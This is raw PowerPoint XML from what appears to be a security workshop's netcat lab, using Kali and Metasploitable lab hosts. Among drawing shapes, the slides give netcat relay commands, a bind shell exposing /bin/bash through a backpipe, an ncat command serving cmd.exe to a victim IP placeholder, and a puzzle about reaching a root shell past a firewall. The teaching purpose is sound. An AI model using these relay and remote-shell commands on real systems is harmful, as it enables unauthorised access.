              <a:gd name="connsiteX2" fmla="*/ 1072475 w 5456865"/>
              <a:gd name="connsiteY2" fmla="*/ 1613142 h 2517328"/>
              <a:gd name="connsiteX3" fmla="*/ 1415750 w 5456865"/>
              <a:gd name="connsiteY3" fmla="*/ 2436875 h 2517328"/>
              <a:gd name="connsiteX4" fmla="*/ 2497068 w 5456865"/>
              <a:gd name="connsiteY4" fmla="*/ 2402552 h 2517328"/>
              <a:gd name="connsiteX5" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY5" fmla="*/ 1698948 h 2517328"/>
              <a:gd name="connsiteX6" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY6" fmla="*/ 926699 h 2517328"/>
              <a:gd name="connsiteX7" fmla="*/ 2823180 w 5456865"/>
              <a:gd name="connsiteY7" fmla="*/ 858054 h 2517328"/>
              <a:gd name="connsiteX8" fmla="*/ 3629877 w 5456865"/>
              <a:gd name="connsiteY8" fmla="*/ 514833 h 2517328"/>
              <a:gd name="connsiteX9" fmla="*/ 4419410 w 5456865"/>
              <a:gd name="connsiteY9" fmla="*/ 1012504 h 2517328"/>
              <a:gd name="connsiteX10" fmla="*/ 4848505 w 5456865"/>
              <a:gd name="connsiteY10" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX11" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY11" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX12" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY12" fmla="*/ 2282425 h 2517328"/>
              <a:gd name="connsiteX13" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY13" fmla="*/ 2316747 h 251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56865" h="2517328">
                <a:moveTo>
                  <a:pt x="94140" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12612" y="517693"/>
                  <a:pt x="-68916" y="1035386"/>
                  <a:pt x="94140" y="1304243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257196" y="1573100"/>
                  <a:pt x="852207" y="1424370"/>
                  <a:pt x="1072475" y="1613142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1292743" y="1801914"/>
                  <a:pt x="1178318" y="2305307"/>
                  <a:pt x="1415750" y="2436875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1653182" y="2568443"/>
                  <a:pt x="2273939" y="2525540"/>
                  <a:pt x="2497068" y="2402552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2720197" y="2279564"/>
                  <a:pt x="2711615" y="1944923"/>
                  <a:pt x="2754524" y="1698948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2797433" y="1452973"/>
                  <a:pt x="2743081" y="1066848"/>
                  <a:pt x="2754524" y="926699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2765967" y="786550"/>
                  <a:pt x="2677288" y="926698"/>
                  <a:pt x="2823180" y="858054"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2969072" y="789410"/>
                  <a:pt x="3363839" y="489091"/>
                  <a:pt x="3629877" y="514833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3895915" y="540575"/>
                  <a:pt x="4216305" y="838033"/>
                  <a:pt x="4419410" y="1012504"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4622515" y="1186975"/>
                  <a:pt x="4682589" y="1470133"/>
                  <a:pt x="4848505" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5014421" y="1653185"/>
                  <a:pt x="5320508" y="1441531"/>
                  <a:pt x="5414909" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5509310" y="1681787"/>
                  <a:pt x="5414909" y="2282425"/>
                  <a:pt x="5414909" y="2282425"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5414909" y="2316747"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0000FF"/>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Isosceles Triangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7162800" y="5562600"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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Freeform 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095047" y="3312090"/>
            <a:ext cx="1331975" cy="2386902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1251048 w 1331975"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2386902"/>
              <a:gd name="connsiteX1" fmla="*/ 1251048 w 1331975"/>
              <a:gd name="connsiteY1" fmla="*/ 1287082 h 2386902"/>
              <a:gd name="connsiteX2" fmla="*/ 410023 w 1331975"/>
              <a:gd name="connsiteY2" fmla="*/ 1544498 h 2386902"/>
              <a:gd name="connsiteX3" fmla="*/ 221221 w 1331975"/>
              <a:gd name="connsiteY3" fmla="*/ 2316747 h 2386902"/>
              <a:gd name="connsiteX4" fmla="*/ 15256 w 1331975"/>
              <a:gd name="connsiteY4" fmla="*/ 2351069 h 2386902"/>
              <a:gd name="connsiteX5" fmla="*/ 15256 w 1331975"/>
              <a:gd name="connsiteY5" fmla="*/ 2316747 h 2386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1975" h="2386902">
                <a:moveTo>
                  <a:pt x="1251048" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1321133" y="514833"/>
                  <a:pt x="1391219" y="1029666"/>
                  <a:pt x="1251048" y="1287082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110877" y="1544498"/>
                  <a:pt x="581661" y="1372887"/>
                  <a:pt x="410023" y="1544498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="238385" y="1716109"/>
                  <a:pt x="287015" y="2182319"/>
                  <a:pt x="221221" y="2316747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155426" y="2451176"/>
                  <a:pt x="49583" y="2351069"/>
                  <a:pt x="15256" y="2351069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-19071" y="2351069"/>
                  <a:pt x="15256" y="2316747"/>
                  <a:pt x="15256" y="2316747"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">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Isosceles Triangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6019800" y="5486400"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894367" y="3547341"/>
            <a:ext cx="2962981" cy="2115818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2962981 w 2962981"/>
              <a:gd name="connsiteY0" fmla="*/ 2115818 h 2115818"/>
              <a:gd name="connsiteX1" fmla="*/ 2327921 w 2962981"/>
              <a:gd name="connsiteY1" fmla="*/ 1463697 h 2115818"/>
              <a:gd name="connsiteX2" fmla="*/ 2224938 w 2962981"/>
              <a:gd name="connsiteY2" fmla="*/ 451193 h 2115818"/>
              <a:gd name="connsiteX3" fmla="*/ 1641370 w 2962981"/>
              <a:gd name="connsiteY3" fmla="*/ 22165 h 2115818"/>
              <a:gd name="connsiteX4" fmla="*/ 989147 w 2962981"/>
              <a:gd name="connsiteY4" fmla="*/ 1086153 h 2115818"/>
              <a:gd name="connsiteX5" fmla="*/ 113794 w 2962981"/>
              <a:gd name="connsiteY5" fmla="*/ 1309247 h 2115818"/>
              <a:gd name="connsiteX6" fmla="*/ 10812 w 2962981"/>
              <a:gd name="connsiteY6" fmla="*/ 2115818 h 2115818"/>
              <a:gd name="connsiteX7" fmla="*/ 10812 w 2962981"/>
              <a:gd name="connsiteY7" fmla="*/ 2115818 h 2115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2981" h="2115818">
                <a:moveTo>
                  <a:pt x="2962981" y="2115818"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2706954" y="1928476"/>
                  <a:pt x="2450928" y="1741135"/>
                  <a:pt x="2327921" y="1463697"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2204914" y="1186259"/>
                  <a:pt x="2339363" y="691448"/>
                  <a:pt x="2224938" y="451193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2110513" y="210938"/>
                  <a:pt x="1847335" y="-83662"/>
                  <a:pt x="1641370" y="22165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1435405" y="127992"/>
                  <a:pt x="1243743" y="871639"/>
                  <a:pt x="989147" y="1086153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734551" y="1300667"/>
                  <a:pt x="276850" y="1137636"/>
                  <a:pt x="113794" y="1309247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-49262" y="1480858"/>
                  <a:pt x="10812" y="2115818"/>
                  <a:pt x="10812" y="2115818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10812" y="2115818"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">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Isosceles Triangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1752600" y="5562600"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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127982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334000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="F2DCDB"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>DEMO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create 2 terminals. Use Terminal-&gt;Set Title to name them TERM1 and TERM2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>We will have TERM1 be a netcat listener, and TERM2 a netcat client – with a relay setup on Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple One Direction Relay:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TERM1:		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 5678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploitable:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 1234 | nc kali.ftrlab 5678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TERM2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ms.ftrlab 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enter text into TERM2 – does it make it through?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enter text into TERM1 – where does it end up?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>2 Direction Relay with Backpipe:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TERM2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Victim):	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>–lp 22222 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 0&lt;backpipe | nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>kali.ftrlab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>22222 1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TERM1 (Attacker):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc ms.ftrlab 11111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 10" descr="http://eswt.net/wp-content/uploads/2011/06/hands-on_workshop.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077200" y="0"/>
            <a:ext cx="1066800" cy="663787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418348057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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Alternatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Socat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Cryptcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Ncat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ncat –-exec cmd.exe –-ssl –-allow [IP] –vnl [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ncat [VICTIM_IP] [PORT] --ssl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13112482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E" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pUZZLE TIME</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95994427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962400" y="762000"/>
            <a:ext cx="1367732" cy="3962400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1600200"/>
            <a:ext cx="3185901" cy="2120900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="1524000"/>
            <a:ext cx="2946400" cy="2197100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="3810000"/>
            <a:ext cx="2895600" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Root shell on port 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="4800600"/>
            <a:ext cx="2895600" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Block all inbound SYN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>But allows all outbound packets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="5867400"/>
            <a:ext cx="8610601" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenge: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What commands can you run as the limited user so the attacker can access the root shell from his machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7927625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334000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
